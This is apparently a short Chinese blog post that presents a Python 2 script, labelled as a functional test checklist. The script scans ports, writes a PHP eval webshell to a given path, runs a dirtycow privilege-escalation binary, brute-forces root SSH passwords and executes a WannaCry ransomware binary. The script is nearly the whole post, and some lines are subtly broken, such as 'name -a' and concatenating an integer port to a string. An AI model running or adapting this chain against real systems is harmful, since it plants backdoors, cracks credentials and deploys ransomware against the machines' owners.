功能测试脚本一例
前言:
n久之前为测试写的脚本,都已经更新几个版本了。把最简单都版本放出来。
测试要求尽量少用第三方库。
# coding:utf-8 import socket import sys import os import paramiko # 扫描渗透溯源的端口 def scan_port(host): ports = [21, 22, 23, 53, 139, 445, 1433, 3306, 3389] target_ip = socket.gethostbyname(host) for port in ports: print "port scanning is %s " % port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2) result = sock.connect_ex((target_ip, port)) if result == 0: print("open_port:" + port) # 执行命令 def exec_system(): print(os.system('whoami')) print(os.system('name -a')) print(os.system('cat /proc/version')) # 使用dirtycow提权 def get_root(path): path = path + '/dirtycow' os.system("chmod +x {}".format(path)) os.system("./{}".format(path)) # 生成脚本木马 def echo_webshell(path): path = path + '/webshell.php' with open(path, 'w') as f: f.writelines("<?php @eval($_POST['cmd']);?>") # 远程连接ssh def ssh_connect(host): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) password = ['toor', 'admin123'] for pwd in password: try: ssh.connect(hostname=host, port=22, username='root', password=pwd, timeout=5) ssh.close() print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host) except paramiko.AuthenticationException, e: pass except socket.error, e: pass # 执行wannacry勒索脚本 def exec_wannacry(path): path = path + '/wannacry' os.system("chmod +x {}".format(path)) os.system("./{}".format(path)) if __name__ == '__main__': if len(sys.argv) < 2: print('argument error') print('example:python checklist.py -h 127.0.0.1 -p /tmp/') exit(0) host = sys.argv[2] path = sys.argv[4] scan_port(host) echo_webshell(path) get_root(path) ssh_connect(host) exec_wannacry(path)